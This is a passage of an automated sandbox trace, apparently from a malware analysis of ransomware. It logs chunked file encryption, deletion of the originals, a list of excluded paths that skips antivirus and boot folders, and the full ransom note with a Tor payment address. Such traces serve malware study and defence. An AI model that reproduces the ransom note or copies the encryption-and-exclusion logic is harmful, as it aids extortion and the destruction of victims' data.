lpOverlapped=0x0) returned 1 [0160.528] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.528] GetLastError () returned 0x0 [0160.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.528] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.528] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.528] GetLastError () returned 0x0 [0160.528] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.529] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.529] GetLastError () returned 0x0 [0160.529] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.529] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.529] GetLastError () returned 0x0 [0160.529] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.529] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.529] GetLastError () returned 0x0 [0160.529] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.529] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.529] GetLastError () returned 0x0 [0160.529] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.529] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.529] GetLastError () returned 0x0 [0160.529] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.529] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.530] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.530] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui")) returned 0x20 [0160.530] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.530] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned 1 [0160.530] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui")) returned 0 [0160.530] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" [0160.530] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO") returned 1 [0160.531] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\.xXE66D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\.xxe66d.tmp")) returned 0xe66d [0160.531] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\.xXE66D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\.xxe66d.tmp"), dwFlags=0x1) returned 0 [0160.531] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\.xXE66D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\.xxe66d.tmp")) returned 1 [0160.532] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0160.532] wcslen (_String="OK") returned 0x2 [0160.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.532] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.532] CryptDestroyKey (hKey=0x9ad638) returned 1 [0160.532] CryptDestroyHash (hHash=0x9ad738) returned 1 [0160.532] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0160.532] FindNextFileW (in: hFindFile=0x9ad2b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.532] GetLastError () returned 0x12 [0160.532] FindClose (in: hFindFile=0x9ad2b8 | out: hFindFile=0x9ad2b8) returned 1 [0160.532] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ro-RO\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ro-ro\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.532] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.533] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.533] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.533] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.534] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.534] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.534] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.exe") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.dll") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.lnk") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.bat") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.ini") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.msi") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*.scf") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*pagefile.sys*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*AppData*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\winrar\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\java\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\windows\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\ESET\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\AVG\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*Atheros*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*Realtek*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*bootmgr*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*boot*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*boot*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*IO.SYS*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*ntldr*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*chrome*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*opera*") returned 0 [0160.534] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", pszSpec="*firefox*") returned 0 [0160.534] wcslen (_String="\\\\?\\") returned 0x4 [0160.534] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1b8 [0160.535] wcscmp (_String1=".", _String2=".") returned 0 [0160.535] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.535] wcscmp (_String1="..", _String2=".") returned 1 [0160.535] wcscmp (_String1="..", _String2="..") returned 0 [0160.535] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.535] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.535] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ru-RU\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.535] strlen (_Str="NMoreira") returned 0x8 [0160.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.535] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.536] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.537] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 